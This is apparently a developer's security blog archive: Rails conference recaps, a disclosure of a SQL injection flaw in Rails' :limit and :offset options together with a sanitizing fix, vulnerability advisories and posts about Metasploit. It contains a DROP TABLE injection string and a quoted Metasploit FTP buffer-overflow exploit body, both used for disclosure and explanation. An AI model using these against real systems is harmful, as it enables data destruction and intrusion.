Ruby En Rails 2009 Recap

Posted by Jonathan

The past few days in Amsterdam for Ruby En Rails 2009 were really great.

I arrived on Thursday and had the chance to discuss a possible security vulnerability in Rails I discovered a while back with Yehuda and Mislav during lunch.

Afterwards we went to the conference dinner and met many very nice people and had a long discussion about voting systems, European vs. American culture, gun laws, and political systems.

Friday was the first conference day and started for us 40 minutes late, as we had headed to the wrong metro station. Yehuda was supposed to give a keynote as the first session... luckily the organizers swapped the sessions. So unfortunately we missed the first session but were in time for Yehuda to give his keynote.

Yehuda talked about the Rails/Merb merge and dissected what was achieved. It was a very good, in-depth presentation about the new features of Rails 3 and what is left to do. I really liked the new router DSL, actions being Rack apps, and the death of Rails Metal (the new, slicker possibility to build simpler/smaller controllers takes care of this).

After the coffee break I gave my Rails Security presentation about common attacks against web applications and how you can protect against them in Rails. Usually this is quite heavy stuff and people tend to sit quiet and listen, as this is new to most. In Amsterdam I had some very good questions and discussions on session fixation, JavaScript hijacking, and app reconnaissance.

Then we listened to Julio Javier Cicchelli talk about Rubyists.EU, an effort to make the different European Rails communities easier to find and build a common European community.

We went to lunch with James, which gave us some time to catch up. It took us a while to find a decent place around the conference hall, but we managed to find a restaurant where we tried to estimate the global financial burden caused by Internet Explorer and what would happen to Microsoft if they were charged for the extra work it requires.

After lunch Eloy educated us about the current state of MacRuby. I'm really looking forward to spending some time hacking Mac apps in Ruby.

The next session gave an overview about monitoring, performance, and the different tools like request-log-analyzer or Nagios.

The conference was closed by Jeremy giving a keynote about Rails, Ruby, and the current state of things in the community (and a sneak peek at ActiveRelation and what it will be able to do). It was very well received and a good closing session.

Afterwards a big group headed for dinner. We ended up in a small, very local restaurant. It included very nice food, good discussions with new friends from Finland, and a waiter/owner who runs the restaurant homepage with Rails and asked Yehuda for help :-)

The next day was titled Geek Day and included many lightning talks (that ended up being nearly full sessions and had very good content). Parallel to the great sessions about MongoDB, DataMapper, or experience reports, a Rails Rumble featuring five teams was going on.

The most notable session of the second day was Justin Halsall, dressed for Halloween, talking about BlockHelpers and view DSLs. It was a hilarious show.

The Rumble was a great idea. In contrast to the usual Rumble the teams got a specific challenge. They should build something that improves the situation with Rails dependencies and out-of-date gems lying around in vendor/gems. The winning team would get two tickets to RailsConf 2010.

One team extended builder to list outdated gems and even got their changes merged back into builder by Yehuda on the same day. Another team extended Webistrano to accept project dependencies and display them on the stage page. Some teams built a command line tool to extract local dependencies like your gems or even the MySQL version and push those definitions to a central place. The winning team had the most advanced idea regarding update notification and gem-sets for applications. I could really see something like this being integrated into gemcutter. Congratulations Ludo and Michel!

Ruby En Rails day two was celebrated with a big dinner and drinks. After a very nice evening we headed back to the hotel as everybody had an early flight out. Some were still discussing Rails, some were lucky to be able to enjoy Amsterdam longer.

I really enjoyed the conference and Amsterdam. Thank you Chris and Tim Obdam for organizing the whole event!

Ruby on Rails Security

Posted by Jonathan

Recently I've been made aware of people inside US Government organizations using my Ruby on Rails Security presentation as an excuse to limit Ruby on Rails adoption and projects inside those organizations.

They mandate that applications in Rails should be redone in Java because of the issues I covered.

It is not clear to me how anybody who saw/read this presentation would come to the conclusion that Rails is insecure. Every application is vulnerable, some more and some less. Yes, this means that Java applications are attackable too.

It is my honest and strong belief that Ruby on Rails applications are not less secure than any other web application. In contrast, the Ruby on Rails framework provides several advanced security mechanisms that make it very easy to write secure applications. Further, Ruby on Rails enables very sane security options by default. Some of those defaults include auto-escaping, protection against Cross-Site Request Forgery, and protection against SQL injection. I would even go as far as to state that the typical Rails application is more secure than the typical web application for those reasons.

The security of an application stands and falls with the knowledge and abilities of the people implementing and running it. Rails makes it very easy to write secure applications.

The conclusion I came to in my presentation still holds:

Ruby is by no means a "web app security silver bullet" but adding security is easy and not a pain like in many other frameworks

I hope this will change the opinion of some people and remove my presentation as their argument.

RailsConf Europe 2008

Posted by Jonathan

Day two of RailsConf Europe 2008 is over and so are my two sessions.

On tutorial day Mathias and I did a 4h workshop on deploying and monitoring Rails applications. The tutorial went really well, apart from the AirportExpress base station not coping with 100 laptops connecting to it. In the practical part we had a FreeBSD server with 40 virtual machines running and helped the audience deploy an example application with git or svn and Mongrel or mod_rails.

On day two I held my Security on Rails session, where I go over the various attacks and countermeasures against Rails applications. This session was also well received and I hope I could educate people a bit about web application security.

The slides are available as PDF here: Security on Rails (PDF) Deploying and Monitoring Rails (PDF)

Further, you can find both presentations at slideshare.

If you attended one of my sessions, I encourage you to rate them at the conference site.

So far my expectations have been met and I've been able to catch up with a lot of people. I'm looking forward to day three of RailsConf Europe!

Why you should upgrade to Rails 2.1

Posted by Jonathan

If you are following my twitter stream you have probably read me rambling about a security hole in Rails < 2.1.

With Rails 2.1 out for a while I thought I should describe the problem a bit, as there are many Rails applications stuck on 1.2.3 or 2.0.

The story begins with me giving a talk about Ruby on Rails security at Dynamic Languages World Europe in Karlsruhe. While talking about SQL injection, Tobias Schlottke, a fellow German Rails developer, mentioned that he once saw ActiveRecord allowing random SQL in the :offset option. Everybody in the room agreed that shouldn't be possible or wanted.

Later that day I sat down with Steven Bristol and we tried to verify this. Playing with MySQL we only got ActiveRecord::StatementInvalid exceptions. So I installed PostgreSQL (damn you MacPorts!) and tried the same with PostgreSQL and SQLite. Both times I got straight SQL injection. Looking through the code I found out that the :limit parameter was also prone to SQL injection:

# vulnerable controller code
User.find(:all, :limit => params[:limit])

User.find(:all, :limit => 10, :offset => params[:offset])

# with params[:offset] or params[:limit] set to '; DROP TABLE users;'
# you got a big problem ...

MySQL is also affected, but thanks to its default setting of disallowing multiple SQL statements per API call you cannot append a second SQL statement. You can only manipulate the one being executed by setting other parameters (like an offset).

I've seen a lot of code taking the :offset parameter straight from the HTTP params, and everybody I talked with considered it a big problem. Especially since the documentation describes :offset and :limit as two integers (so you, or at least I, would expect auto-quoting like that done for User.find(params[:id])).

I wrote a patch that casts both :limit and :offset to integers and sent it to core@ hoping for it to be included before Rails 2.1. After a bit of discussion about whether this is a bug or a feature (as apparently :limit can also be '1, 5'), Steven got hold of DHH at RailsConf and of Aaron Bedra, who apparently discovered this problem a couple of months ago. Steven wrote a new patch with Aaron that also checks for the '1, 5' syntax of :limit and David committed it for Rails 2.1.

Unfortunately the committed patch didn't include a fix for the MySQL adapter, as it overrides the method that adds the limit and offset options. This isn't as bad as it sounds, as MySQL will not allow multiple SQL statements by default. David later committed a patch of mine fixing MySQL in edge (and the coming 2.1.1).
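To make the casting approach concrete, here is an added example (not the patch that went into Rails 2.1 and not ActiveRecord's own code): a small sanitizer that accepts integers and the '1, 5' form of :limit and rejects anything else before it can reach the SQL string. The method names, the add_limit_offset stand-in for the adapter method, and the sample SQL are assumptions made for this illustration.

```ruby
# Added example (not the Rails 2.1 patch or ActiveRecord code): cast
# :limit and :offset to integers before they are interpolated into SQL.
# Integer() with an explicit base 10 accepts only a decimal integer literal
# (surrounding whitespace allowed) and raises ArgumentError on anything
# else, so a value like "1; DROP TABLE users;" never reaches the database.
def sanitize_offset(offset)
  return offset if offset.is_a?(Integer)
  Integer(offset.to_s, 10)
end

# :limit may also be given in the "1, 5" form mentioned above. Each part is
# cast separately, so "1, 5" becomes "1,5" while "1, 5; DROP TABLE users;"
# raises because the second part is not an integer literal.
def sanitize_limit(limit)
  return limit if limit.is_a?(Integer)
  str = limit.to_s
  if str.include?(',')
    str.split(',', -1).map { |part| Integer(part, 10) }.join(',')
  else
    Integer(str, 10)
  end
end

# Hypothetical stand-in for the adapter method that appends LIMIT/OFFSET to
# a finished SELECT. Only sanitized values are ever interpolated.
def add_limit_offset(sql, options)
  sql = sql.dup
  sql << " LIMIT #{sanitize_limit(options[:limit])}" if options[:limit]
  sql << " OFFSET #{sanitize_offset(options[:offset])}" if options[:offset]
  sql
end

# Convenience check for values taken straight from params: true if the
# value would be accepted, false if the sanitizer would reject it.
def safe_to_use?(value, kind)
  kind == :limit ? sanitize_limit(value) : sanitize_offset(value)
  true
rescue ArgumentError, TypeError
  false
end

if __FILE__ == $0
  # Constructed sample inputs, the second one carrying an injection attempt.
  good = { :limit => "10", :offset => " 20 " }
  puts add_limit_offset("SELECT * FROM users", good)
  bad = { :limit => 10, :offset => "1; DROP TABLE users;" }
  begin
    add_limit_offset("SELECT * FROM users", bad)
  rescue ArgumentError => e
    puts "rejected: #{e.message}"
  end
end
```

Raising on bad input rather than silently coercing it (to_i would turn "1; DROP TABLE users;" into 1) is deliberate: a request that smuggles SQL into a pagination parameter is something you want to see in your logs, not quietly serve.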

So if the new features alone will not bring you to Rails 2.1, here you have another reason to upgrade.

For you guys stuck in 1.2 or 2.0 land, either always cast your :limit and :offset options, or use those patches:

Rails 1.2.3 patch

Rails 2.0.2 patch

P.S.: You guys using will_paginate are safe as it casts the parameters by default.

Upcoming events and talks in May

Posted by Jonathan

May is going to be a busy month, with several conferences and events lined up.

On May 14 I will be giving a lecture on Web 2.0 technologies for the Web 2.0 Start-Ups - Vom Entrepreneur zum Business Angel seminar at the Technical University of Berlin. This seminar, organized by Timo Glaser, is packed with German entrepreneurs, venture capitalists, and founders. My lecture will cover why start-ups nowadays are able to deliver great services and products so fast. Amazon Web Services, Google App Engine, Ajax, Ruby on Rails, and Open Source tools will be part of the story.

On May 27-28 I will be at the Dynamic Languages World Europe conference in Karlsruhe. With speakers like Neal Ford, Jason Seifer, Stefan Tilkov or Gregg Pollack it is an interesting line-up. I will be talking about Ruby on Rails Security, from deployment security to CSRF or XSS in Rails.

May ends for me with Linuxtag 2008 here in Berlin (May 28-31). There I will also talk about Ruby on Rails Security. Further, it seems like a very interesting project I'm part of will present a sneak peek.

24C3 - Ruby on Rails Security

Posted by Jonathan

The slides and a video of my Ruby on Rails Security session are now online. The 24C3 was a lot of fun, unfortunately I couldn't spend all 4 days there.

My talk covered most of the common web application vulnerabilities like Cross Site Scripting and Cross Site Request Forgery, SQL and code injection, and deployment security, and how they apply to Rails. Further, Ruby on Rails specific issues like Rails plugin security, JavaScript/Ajax security, and Rails configuration were examined and best practice solutions were introduced.

There is also a Google Video version: Ruby on Rails Security.

Get the slides (PDF - 1.6 MB) or the video (mkv - 95 MB). Other formats are available from the official mirrors or the torrent site.

OpenBSD - Only *two* remote holes in the default install, in more than 10 years!

Posted by Jonathan

Yes, there is now a second remote hole in OpenBSD. In the last 10 years there was only one; yesterday Theo de Raadt posted the second one (discovered by Core Security Technologies) to misc@openbsd.org. The vulnerability is a remote kernel buffer overflow in the mbuf handling of the IPv6 code.

So you should patch immediately if you use IPv6 or disable it through PF (as it is enabled by default):

block in inet6

Apart from that, the upcoming 4.1 release (“Puffy Baba & the 40 Vendors”) is available for pre-order.

23C3 - Fahrplan posted

Posted by Jonathan

The conference details and sessions (“Fahrplan”) for the 23C3 – the 23rd Chaos Communication Congress – were posted on the ccc events blog. As usual there are a lot of talks around hacking, security, and computers in today's culture. Interesting sessions around the Web include JSON RPC – Cross Site Scripting and Client Side Web Services or Privacy, Identity, and Anonymity in Web 2.0.

If you are a fellow Ruby enthusiast and plan to come, drop me an email, maybe we can organize a meet-up for Ruby/Rails folks.

So see you from the 27th to the 30th December in Berlin, Germany!

Ruby CGI.rb DoS vulnerability

Posted by Jonathan

There seems to be a Denial of Service vulnerability in Ruby’s CGI.rb that affects all Ruby applications that use CGI for MIME parsing. That includes all Rails applications running on Mongrel or CGI. The only unaffected setups are WEBrick and FastCGI. A malicious URL will cause CGI.rb to spin in an infinite loop at maximum CPU.

So if you are using Mongrel, hotfix your installation by using the latest pre-release that depends on the monkey-patch to CGI.rb:

sudo gem install mongrel --source=http://mongrel.rubyforge.org/releases

If you are using CGI.rb by other means, install the hotfix-gem and require it:

gem install cgi_multipart_eof_fix --source=http://mongrel.rubyforge.org/releases

More details by Zed Shaw here.

Windows WMF Vulnerability and OpenSource

Posted by Jonathan

Richard Bejtlich wrote a good comment/wrap-up on the recent Windows WMF vulnerability and the unofficial patch from Ilfak Guilfanov hosted by SANS.

Richard summarizes:

The unofficial patch Tom references was written by Ilfak Guilfanov and described here. What is this? It’s a patch created by a non-Microsoft developer, acting more rapidly than Microsoft itself. Sure, you can argue that Microsoft is working now to develop a patch that will hopefully address deeper problems, perhaps serious problems. Nevertheless, SANS has reverse engineered the unofficial patch to ensure its validity, wrote a FAQ about the vulnerability, and is now hosting a .msi to ease patch installation. This is unprecedented.

Where is Microsoft on this issue? They published their initial advisory on 28 Dec and updated it 30 Dec. Nothing they’ve done has helped resolve the issue. Meanwhile, the Metasploit project has released a module to generate malicious WMF files. This puts exploit creation in the hands of the lowest common denominator.

Make sure to read his whole post.

Metasploit Framework on Ruby

Posted by Jonathan

Metasploit, the nice exploit framework, released an alpha for the new 3.0 version. Apart from new features and exploits, the language was switched from Perl to Ruby:

Unlike the 2.0 series, the 3.0 branch is written in Ruby, an object-oriented, interpreted scripting language, that has drastically simplified the implementation of the framework.

...

To demonstrate how the 3.0 branch has simplified exploit development, check out the following code sample, which provides the exploit body for the 3Com 3CDaemon 2.0 FTP Username Overflow (3cdaemon_ftp_user.rb):

connect
print_status("Trying target #{target.name}...")
buf = Rex::Text.rand_text_english(2048, payload_badchars)
seh = generate_seh_payload(target.ret)
buf[229, seh.length] = seh
send_cmd( ['USER', buf] , false )
disconnect
handler

Nice and clean, especially if compared to the older Perl exploit wrappers.

Another nice feature is the integration of IRB, as known in Rails from script/console, which allows direct interaction with the framework instance.

A hint for OS X users: Apple’s included version of pack/unpack is of course broken so you need to use another version. I run the framework with fink’s version of Ruby:

# /sw/bin/ruby msfconsole

See the release notes for more information.

22C3 - Private Investigations

Posted by Jonathan

The 22nd Chaos Communication Congress (22C3) is a four-day conference on technology, society and utopia. The Congress offers lectures and workshops on a multitude of topics including (but not limited to) information technology, IT-security, internet, cryptography and generally a critical-creative attitude towards technology and the discussion about the effects of technological advances on society.

So the 22nd CCC is not far away and I wanted to help spread the word. I’ll certainly be there as the congress will be held in my hometown Berlin, Germany. I was thinking about presenting something about Rails and in particular about security issues and default settings in Rails, but when I finally decided to do so it was too late.

There is now an official 22C3 blog, a public wiki and the artwork is also finished.

See you in December!

UPDATE:
The schedule was released.

1und1/www.degut.de

Posted by Jonathan

You would think that 1und1, one of the big players in the German hosting market, would be able to configure its web servers…

PHP warnings on www.degut.de

Metasploit Framework v2.5 released

Posted by Jonathan

From the announcement:

The Metasploit Framework is an advanced open-source exploit development platform. The 2.5 release includes three user interfaces, 105 exploits and 75 payloads.

A demo can be found here.

With Metasploit you can combine different exploits with different payloads into an attack. You can use the included exploits and payloads or write your own with a little help of Perl. Therefore the Metasploit Framework makes it really easy to use public exploits and attack vulnerable systems. I do not know if this is a good thing…

iTunes 6.0 vulnerability

Posted by Jonathan

Airscanner released a security advisory about an iTunes 6.0 shared music Denial of Service/Spoofing/Flooding/Abuse vulnerability.

From the advisory:

Risk Level:
Low: Denial of service (Shared Music anonymous forced disconnect) and list abuse attacks are both merely annoying to iTunes users.
Medium: Shared Music lists from various users can be renamed and swapped, thus creating an environment in which you can’t be sure to whom you are connecting.

Summary:
iTunes is a popular service allowing you to play music, buy music, download music, share music, create playlists, etc.; it includes a video player and other features: http://www.itunes.com
The iTunes Shared Music feature allows users on a network to create playlists from songs on their computer and to share them on the network. When you create a new list and enable sharing, other iTunes users will see your lists under the Shared Music list, unless they change their preferences from the default settings. We discovered that it is possible to create spoofed Shared Music entries, to rename existing entries, to disconnect existing entries, and to re-initiate existing lists. We can also kill an existing stream without authorization via an anonymous packet.

Workaround:
Disable ‘Look for shared music’ option under the Sharing tab in Preferences.

There is also a Flash demo here.

With Apple becoming more and more popular, security researchers are more interested in OS X applications.